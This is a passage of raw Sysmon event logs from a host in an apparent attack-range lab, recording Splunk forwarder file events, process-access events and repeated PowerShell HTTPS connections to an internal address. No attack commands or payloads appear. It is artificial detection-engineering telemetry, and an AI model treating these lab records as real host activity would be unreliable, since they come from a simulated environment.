Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=880651D2C585BDA2076F70560312EFE1,SHA256=36FEA515F2E6499905F6A7CD6866D861E865F042DAF869EF4768B8EC2A1AC353,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126915Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:43.015{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=94EB05E5ECB3AE2DB19B719093FDCD00,SHA256=3AE2A57AD64E0DA580DF69D6F527359229C6F30CCFEAE3154D7143BA3853767C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126917Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:44.129{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=187C12FEAD01805FC7B46667B48DE918,SHA256=F6AABF0AE09E8AEACC73728B34262D266F94874EA4E54E549A76A683F5A7007D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126919Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.321{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61955-false10.0.1.12-8000- 23542300x800000000000000035126918Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:45.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48DA74995C56352D8F21E39659FC920A,SHA256=87E33ADF8B3E41B776DC1BE67FE3DDBDD30B48FF0D911170ADC572CAB3B2DFAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126922Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:11.565{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61956-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126921Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:46.395{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=D40C570D96A247C74331A5946EF25082,SHA256=C33807AF136B1B1179D5864DA2C1D93C372E7926618E5FD5ACE562436054FEA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:46.180{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4F33C4570063380774589389BC03022,SHA256=09E8425D63F144FEC31E09809103261DB7B475F8A12E3206CDC77AFD1864247C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126923Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:47.195{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FF50305E29CA08131987F28D2D601E31,SHA256=1042D46065E68C9603F22EC65C0E5F640F9EB3A7AF349CE33BDCC28A08F5E866,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126924Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:48.210{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5FDC25D645AE5ED1831DD3E82A0EEBED,SHA256=460F2F424C3F64DF7CF64591DD4658540F76788EBB075978F1B960BE5891D137,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126925Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:49.224{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6EADC4A5BE0F22E9895E22C239EADB30,SHA256=2551347A33967867F15194ACF52038A14C8C2D7FC0FBDCB2BD638037DDEE03C3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126927Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:50.423{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E3EAB62B445DB6860C6F3A0EACCA64F4,SHA256=AAB015463F7802BDCF93978A998390EE3436A4FC5A2B0E5F879F9F395823DA6A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126926Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:50.238{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=874FE6171D89741039E567428054EDFE,SHA256=9DE979D9300CEDA9CBBE166438AB01C53731C98C30B346FEB1237CF125BE25DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126930Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:51.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=09A155EB14DDA3180A6893248812C663,SHA256=503075EBBDC0B87568C79A83412E84D2B64C548067E09221D422DEAAED41B83D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126929Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:15.585{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61958-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035126928Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:15.431{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61957-false10.0.1.12-8000- 23542300x800000000000000035126931Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:52.273{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B51C71EEEBBE3EBA8C9D0947C47D6B6A,SHA256=6ABD3D2A41B819942643FEBA193B961C9FA8CC27B807C698F04A7866E23702FC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126932Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:53.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3A73AEF14AD8FD6DD2F316F2EA150546,SHA256=AF46046C07365BF74428B94BC2A603239F5E1A0B1D88C7F527243B737456765D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126933Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:54.334{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C604DB08142553E48383CB264649F7A0,SHA256=7F34D878DDB04B8B767C992570DE556ACECBE2168E8949B0FBC019724A5FFDE7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126935Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:55.434{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F4521953471975126FCAC2EB91B2B1FA,SHA256=24E3E3D3C00A04CD6DB8D9DF2004EBC19B5117341ED1060BF11EA2AAB74CF487,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126934Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:55.402{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32ADC5547BB979D0C152F5B0BB001B84,SHA256=C3573E6B00364A804DBABBD01909FAE740BF11118D8FCA3AF92AD41D13328BE1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126937Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:56.406{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCB71B75C112320F4F1393211BC381E0,SHA256=CA905596E5E539D25A68FC32316ACB87761672EBB62A94E56801FD102F24255F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126936Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:20.595{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61959-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126939Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:57.457{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=47284F7CFFB774F85162A97D37E978C5,SHA256=5D0331F10D493DC1A887E562CA982BD3CEB579FCE71DBEC2758871B074B8D3E9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126938Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:21.325{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61960-false10.0.1.12-8000- 23542300x800000000000000035126940Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:58.473{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B552203671F718C988CCEC1EB62DDC4C,SHA256=DE603926BE44B9E6187CB5C50F612658C4B72AD2220DC8DC55BB9B5C371E19FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126943Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:59.920{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126942Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:59.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6351947EBD343390A6BE33AA59FAEF5,SHA256=7AA62DC1D714B6BD75F615057DFB1781EF937147BE5E90703D32EE12ED6B4D0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126941Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:50:59.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=0FFBD4494B859BCA350C91B393195FCE,SHA256=E4F129669F8BC99F0C55A0B158300E53FC959FD030FE68A83305EFA9AACF218D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126945Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:00.520{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F42CD1B9D408427904D0378C1FC48F2,SHA256=6C1B0B993D4C67EB576B00DD2B92FDB95F00C5B7FBA7866074BC2DCE3C910B82,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126944Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:24.597{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61961-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126946Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:01.556{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F5B0517BC538153EBF56AAD014487E0F,SHA256=F875D8763B456EA685EF06E3F848F87078DC1B90CD6DE108761816933BB145AD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126949Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:02.602{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48F8A7A78BC40242572CE4773F4A984E,SHA256=E4EE56D85E5034CAF9D9A1A492DD47D75B55F1A2C314B1C787FD6CF1296B5A9E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126948Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:27.230{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61963-false10.0.1.12-8000- 354300x800000000000000035126947Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:26.081{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61962-false10.0.1.12-8089- 23542300x800000000000000035126950Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:03.617{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A785B47C2A040AE85DD7AF583151892C,SHA256=DF73A7BFDED011A15960C5BF7EC5D77F132B46060B25295956E1E632A46A1D7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126951Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:04.651{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=77794C6209242490D9418A347835B116,SHA256=15F389EB01A9B68042B9A6C965F616F6A10A28957C36A91919E17038C5C250F2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126953Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:05.668{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B5E3C5E616F0A6A6580B4CCC005E325,SHA256=1FADFC48F873F23CE24120D0B8DEF4370890226EE66D1A631CAA01C09C61DC0A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126952Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:05.600{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=143F637ED2AEC0E4A075BFB5E7726548,SHA256=8C18CEB1E333DAE183059A328D9E56DBE8290FCF7933C69C252E2B6B7791D42E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126955Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:06.683{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E22E296005F75435E0F7ED1FFEE4CADA,SHA256=E46CDE1DA8C920A1DD050C242B1DCA302E482F3DCDE696867702110BB739BB8A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126954Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:30.608{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local61964-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035126956Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:07.714{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92F31355164ECF20AE9C7ED3123CAB6B,SHA256=28409B40579320D743DB07BC807B13B30C338CA96223DE538C3FA0DB8ECAD3D2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035126958Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:08.746{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=62BB7AABE9AF87AB82594CDDE7B0A20F,SHA256=2A2737F648760D23F2C801D1B274ACEF853A676D67850FF05A2580A3C4B18964,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035126957Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:32.260{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local61965-false10.0.1.12-8000- 23542300x800000000000000035126959Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:09.780{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45FAE1B6E9011A7BAF513E057DF0E357,SHA256=FEA6D6D1CAF1DC1E63F7AC2ACF60B8795D85288660C61F94A5D48BDE22E55918,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035126978Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.948{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-81CE-613A-9B96-03000000C801}4372C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126977Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.944{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126976Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.944{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126975Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 21:51:10.944{B81B27B7-4012-611D-0C00-00000000C801}7322020C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035126974Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 